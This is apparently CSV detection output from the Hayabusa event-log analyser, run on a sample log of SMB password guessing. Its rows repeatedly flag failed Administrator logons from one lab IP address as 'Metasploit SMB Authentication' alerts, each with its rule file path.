Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 